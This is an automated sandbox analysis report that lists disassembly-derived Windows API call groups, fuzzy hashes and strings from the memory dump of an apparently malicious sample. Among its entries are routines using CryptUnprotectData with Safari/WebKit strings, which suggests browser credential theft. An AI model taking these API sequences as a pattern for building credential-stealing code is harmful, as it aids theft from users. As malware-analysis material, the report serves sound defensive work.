                                                                        • API String ID: 1936579350-0
                                                                        • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                        • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                        • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                        • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free
                                                                        • String ID:
                                                                        • API String ID: 1294909896-0
                                                                        • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                        • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                        • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                        • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free
                                                                        • String ID:
                                                                        • API String ID: 1294909896-0
                                                                        • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                        • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                        • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                        • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free
                                                                        • String ID:
                                                                        • API String ID: 1294909896-0
                                                                        • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                        • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                        • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                        • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                        APIs
                                                                        • EmptyClipboard.USER32 ref: 004098EC
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                        • GetLastError.KERNEL32 ref: 0040995D
                                                                        • CloseHandle.KERNEL32(?), ref: 00409969
                                                                        • GetLastError.KERNEL32 ref: 00409974
                                                                        • CloseClipboard.USER32 ref: 0040997D
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                        • String ID:
                                                                        • API String ID: 3604893535-0
                                                                        • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                        • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                        • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                        • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 2780580303-317687271
                                                                        • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                        • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                        • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                        • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                        APIs
                                                                        • EmptyClipboard.USER32 ref: 00409882
                                                                        • wcslen.MSVCRT ref: 0040988F
                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                        • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                        • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                        • CloseClipboard.USER32 ref: 004098D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                        • String ID:
                                                                        • API String ID: 1213725291-0
                                                                        • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                        • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                        • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                        • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                        APIs
                                                                        • GetLastError.KERNEL32 ref: 004182D7
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                        • LocalFree.KERNEL32(?), ref: 00418342
                                                                        • free.MSVCRT ref: 00418370
                                                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                        • String ID: OsError 0x%x (%u)
                                                                        • API String ID: 2360000266-2664311388
                                                                        • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                        • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                        • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                        • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@??3@memcpymemset
                                                                        • String ID:
                                                                        • API String ID: 1865533344-0
                                                                        • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                        • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                        • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                        • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                        APIs
                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4255912815-0
                                                                        • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                        • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                        • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                        • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                        APIs
                                                                        • _wcsicmp.MSVCRT ref: 004022A6
                                                                        • _wcsicmp.MSVCRT ref: 004022D7
                                                                        • _wcsicmp.MSVCRT ref: 00402305
                                                                        • _wcsicmp.MSVCRT ref: 00402333
                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                        • memset.MSVCRT ref: 0040265F
                                                                        • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                        • API String ID: 2929817778-1134094380
                                                                        • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                                        • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                        • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                                        • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                        • String ID: :stringdata$ftp://$http://$https://
                                                                        • API String ID: 2787044678-1921111777
                                                                        • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                        • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                        • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                        • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                        • GetDC.USER32 ref: 004140E3
                                                                        • wcslen.MSVCRT ref: 00414123
                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                                                        • _snwprintf.MSVCRT ref: 00414244
                                                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                        • String ID: %s:$EDIT$STATIC
                                                                        • API String ID: 2080319088-3046471546
                                                                        • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                        • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                        • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                        • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00413221
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                        • memset.MSVCRT ref: 00413292
                                                                        • memset.MSVCRT ref: 004132B4
                                                                        • memset.MSVCRT ref: 004132CD
                                                                        • memset.MSVCRT ref: 004132E1
                                                                        • memset.MSVCRT ref: 004132FB
                                                                        • memset.MSVCRT ref: 00413310
                                                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                        • memset.MSVCRT ref: 004133C0
                                                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                        • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                        • wcscpy.MSVCRT ref: 0041341F
                                                                        • _snwprintf.MSVCRT ref: 0041348E
                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                        • SetFocus.USER32(00000000), ref: 004134B7
                                                                        Strings
                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                        • {Unknown}, xrefs: 004132A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                        • API String ID: 4111938811-1819279800
                                                                        • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                        • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                        • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                        • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                        • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                        • EndDialog.USER32(?,?), ref: 0040135E
                                                                        • DeleteObject.GDI32(?), ref: 0040136A
                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                        • ShowWindow.USER32(00000000), ref: 00401398
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                        • String ID:
                                                                        • API String ID: 829165378-0
                                                                        • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                        • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                        • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                        • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                        • wcscpy.MSVCRT ref: 004041D6
                                                                        • wcscpy.MSVCRT ref: 004041E7
                                                                        • memset.MSVCRT ref: 00404200
                                                                        • memset.MSVCRT ref: 00404215
                                                                        • _snwprintf.MSVCRT ref: 0040422F
                                                                        • wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 0040426E
                                                                        • memset.MSVCRT ref: 004042CD
                                                                        • memset.MSVCRT ref: 004042E2
                                                                        • _snwprintf.MSVCRT ref: 004042FE
                                                                        • wcscpy.MSVCRT ref: 00404311
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
